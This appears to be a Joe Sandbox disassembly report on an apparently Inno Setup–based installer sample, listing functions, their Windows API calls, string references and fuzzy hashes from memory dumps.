Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D

Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A24620MetricsSystem$A480A570
String ID:
API String ID: 4042297458-0
Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9

Function 0047CC90 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49

Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B

UnrealizeObject.GDI32(00000000), ref: 0041B28C
SelectObject.GDI32(?,00000000), ref: 0041B29E
SetBkColor.GDI32(?,00000000), ref: 0041B2C1
SetBkMode.GDI32(?,00000002), ref: 0041B2CC
SetBkColor.GDI32(?,00000000), ref: 0041B2E7
SetBkMode.GDI32(?,00000001), ref: 0041B2F2

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D

Function 00452F1C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B

Strings

.tmp, xrefs: 00452FBF
}RI, xrefs: 00452F4C, 00452F57, 00452FB2, 00452FBC, 00452F8C, 00452F96
$pI, xrefs: 00452FAD

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: $pI$.tmp$}RI
API String ID: 3498533004-1860564545
Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD

Function 00496220 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D

Strings

.msg, xrefs: 004962BC
Uninstall, xrefs: 0049623C
.dat, xrefs: 0049629D
IMsg, xrefs: 0049632A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C

Function 004966D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786

Strings

isRS-%.3u.tmp, xrefs: 00496723
$pI, xrefs: 00496713, 0049672D, 004967BC, 00496716

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$Attributes$Move
String ID: $pI$isRS-%.3u.tmp
API String ID: 3839737484-4128586672
Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59

Function 0042E91C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D

Strings

ShutdownBlockReasonCreate, xrefs: 0042E944
user32.dll, xrefs: 0042E949

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F

Function 004534B2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

$pI, xrefs: 00453594
MoveFile, xrefs: 004534ED
DeleteFile, xrefs: 004534D0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: $pI$DeleteFile$MoveFile
API String ID: 3024442154-1403374609
Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929

Function 0042E820 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

Strings

user32.dll, xrefs: 0042E831
ChangeWindowMessageFilter, xrefs: 0042E82C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F

Function 0047663C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00476644
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D

Strings

user32.dll, xrefs: 00476652
AllowSetForegroundWindow, xrefs: 0047664D

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C

Function 0044EF98 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Strings

dD, xrefs: 0044EFAB
NotifyWinEvent, xrefs: 0044EFC9
user32.dll, xrefs: 0044EFCE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NotifyWinEvent$dD$user32.dll
API String ID: 1646373207-754903266
Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F

Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00416C62
SaveDC.GDI32(?), ref: 00416C93
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
RestoreDC.GDI32(?,?), ref: 00416D1B
EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58

Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414846
MulDiv.KERNEL32(?,?,?), ref: 00414860
MulDiv.KERNEL32(?,?,?), ref: 00414889
MulDiv.KERNEL32(?,?,?), ref: 004148B4
MulDiv.KERNEL32(00000000,?,00000000), ref: 004148FC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19

Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C

Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
DeleteObject.GDI32(00000000), ref: 0041BCAA

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MetricsSystem$A26310A570DeleteObject
String ID:
API String ID: 4277397052-0
Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98

Function 0047255C Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7

GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF

Strings

Failed to set permissions on registry key (%d)., xrefs: 00472610
Setting permissions on registry key: %s\%s, xrefs: 004725AE
Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
